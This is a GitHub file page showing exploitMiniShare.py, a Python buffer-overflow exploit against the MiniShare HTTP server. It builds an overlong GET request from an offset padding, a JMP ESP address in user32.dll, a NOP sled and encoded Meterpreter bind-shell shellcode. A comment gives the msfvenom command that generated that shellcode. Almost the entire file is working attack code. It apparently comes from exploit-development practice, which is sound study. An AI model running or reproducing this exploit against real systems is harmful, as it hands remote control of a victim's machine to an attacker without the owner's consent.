-
Notifications
You must be signed in to change notification settings - Fork 7
Expand file tree
/
Copy pathexploitMiniShare.py
More file actions
executable file
·81 lines (49 loc) · 2.51 KB
/
Copy pathexploitMiniShare.py
File metadata and controls
executable file
·81 lines (49 loc) · 2.51 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python
#Written in python
import socket, sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Connect to port 80
sock.connect((sys.argv[1],80))
#Minishare URL parsing is vulnerable,
# We will send a request on the target machine on port 80 with our payload
#We have to use the proper HTTP headers so that the application parses our request.
buf="GET "
#Offset found at 1787
buf+="A"*1787
#JMP ESP to an address in user32.dll 7E 42 93 53, JMP ESP
buf+="\x53\x93\x42\x7e"
#Nop sled
buf+="\x90"*40
#Same shellcode as ServerStrcpy
buf += b"\xdb\xd3\xbb\x50\x28\x15\x7d\xd9\x74\x24\xf4\x5f\x2b"
buf += b"\xc9\xb1\x4e\x83\xef\xfc\x31\x5f\x14\x03\x5f\x44\xca"
buf += b"\xe0\x81\x8c\x88\x0b\x7a\x4c\xed\x82\x9f\x7d\x2d\xf0"
buf += b"\xd4\x2d\x9d\x72\xb8\xc1\x56\xd6\x29\x52\x1a\xff\x5e"
buf += b"\xd3\x91\xd9\x51\xe4\x8a\x1a\xf3\x66\xd1\x4e\xd3\x57"
buf += b"\x1a\x83\x12\x90\x47\x6e\x46\x49\x03\xdd\x77\xfe\x59"
buf += b"\xde\xfc\x4c\x4f\x66\xe0\x04\x6e\x47\xb7\x1f\x29\x47"
buf += b"\x39\xcc\x41\xce\x21\x11\x6f\x98\xda\xe1\x1b\x1b\x0b"
buf += b"\x38\xe3\xb0\x72\xf5\x16\xc8\xb3\x31\xc9\xbf\xcd\x42"
buf += b"\x74\xb8\x09\x39\xa2\x4d\x8a\x99\x21\xf5\x76\x18\xe5"
buf += b"\x60\xfc\x16\x42\xe6\x5a\x3a\x55\x2b\xd1\x46\xde\xca"
buf += b"\x36\xcf\xa4\xe8\x92\x94\x7f\x90\x83\x70\xd1\xad\xd4"
buf += b"\xdb\x8e\x0b\x9e\xf1\xdb\x21\xfd\x9d\x28\x08\xfe\x5d"
buf += b"\x27\x1b\x8d\x6f\xe8\xb7\x19\xc3\x61\x1e\xdd\x24\x58"
buf += b"\xe6\x71\xdb\x63\x17\x5b\x1f\x37\x47\xf3\xb6\x38\x0c"
buf += b"\x03\x37\xed\xb9\x08\x9e\x5e\xdc\xf2\x4a\x5e\x4a\x0f"
buf += b"\xe2\x8a\x85\xd0\x12\xb5\x4f\x79\xba\x48\x70\x2b\xa6"
buf += b"\xc4\x96\x59\xc6\x80\x01\xf6\x24\xf7\x99\x61\x57\xdd"
buf += b"\x63\xad\xd2\x86\x3c\x46\xab\xde\xfb\x69\x2c\xf5\xab"
buf += b"\xfd\xa6\x1a\x68\x1f\xb9\x36\xd8\x48\x2d\xcc\x89\x3b"
buf += b"\xcc\xd1\x83\xae\x0e\x44\x28\x79\x59\xf0\x32\x5c\xad"
buf += b"\x5f\xcc\x8b\xae\x98\x32\x4a\x9d\xd3\x05\xd8\x9d\x8b"
buf += b"\x69\x0c\x1d\x4c\x3c\x46\x1d\x24\x98\x32\x4e\x51\xe7"
buf += b"\xee\xe3\xca\x72\x11\x55\xbe\xd5\x79\x5b\x99\x12\x26"
buf += b"\xa4\xcc\x20\x21\x5a\x91\x21\xd3\x99\x44\xe8\xa6\xf4"
buf += b"\x54\x4f\xb8\xb3\xf9\xe6\x53\xbb\xae\xf9\x71"
buf+="HTTP/1.1\r\n\r\n"
#NOP sled. Your address might be an instruction space which is not properly pointed to by stack due to various reasons.
#msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.59.130 LPORT=44444 --bad-chars '\x00\x0a\x0d' -f python
#Your shellcode might have bad characters as well which need to be truncated.
sock.send(buf)
sock.close()